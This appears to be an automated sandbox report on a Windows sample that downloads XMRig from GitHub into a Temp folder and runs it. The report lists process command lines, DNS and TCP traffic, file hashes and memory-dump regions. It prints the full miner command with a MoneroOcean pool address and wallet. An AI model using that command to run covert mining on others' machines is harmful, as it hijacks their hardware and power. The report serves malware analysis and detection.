"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4212,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4016 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3812,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4476 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

memory/1740-0-0x00007FF8AEB93000-0x00007FF8AEB95000-memory.dmp

memory/1740-1-0x0000025A338F0000-0x0000025A33912000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ra5bsgoo.cwi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1740-11-0x00007FF8AEB90000-0x00007FF8AF651000-memory.dmp

memory/1740-12-0x00007FF8AEB90000-0x00007FF8AF651000-memory.dmp

memory/1740-14-0x00007FF8AEB90000-0x00007FF8AF651000-memory.dmp

memory/1740-15-0x0000025A33C80000-0x0000025A33C92000-memory.dmp

memory/1740-16-0x0000025A33C70000-0x0000025A33C7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4032-47-0x0000020EB7470000-0x0000020EB7490000-memory.dmp

memory/4032-48-0x0000020EB75C0000-0x0000020EB75E0000-memory.dmp

memory/4032-49-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-50-0x0000020EB75E0000-0x0000020EB7600000-memory.dmp

memory/4032-51-0x0000020EB7620000-0x0000020EB7640000-memory.dmp

memory/4032-52-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/1740-53-0x00007FF8AEB93000-0x00007FF8AEB95000-memory.dmp

memory/1740-54-0x00007FF8AEB90000-0x00007FF8AF651000-memory.dmp

memory/4032-55-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/1740-56-0x00007FF8AEB90000-0x00007FF8AF651000-memory.dmp

memory/4032-57-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-59-0x0000020EB7620000-0x0000020EB7640000-memory.dmp

memory/4032-58-0x0000020EB75E0000-0x0000020EB7600000-memory.dmp

memory/4032-60-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-61-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-62-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-63-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-64-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-65-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-66-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-67-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-68-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-69-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-70-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-71-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-72-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-73-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-74-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-75-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-76-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-77-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-78-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-79-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-80-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-81-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-82-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-83-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-84-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-85-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-86-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-87-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-88-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-89-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-90-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-91-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-92-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-93-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-94-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-95-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-96-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-97-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-98-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-99-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-100-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-101-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-102-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-103-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-104-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-105-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-106-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-107-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-108-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-109-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-110-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-111-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-112-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-113-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-114-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-115-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-116-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-117-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp

memory/4032-118-0x00007FF7EDDA0000-0x00007FF7EE9D3000-memory.dmp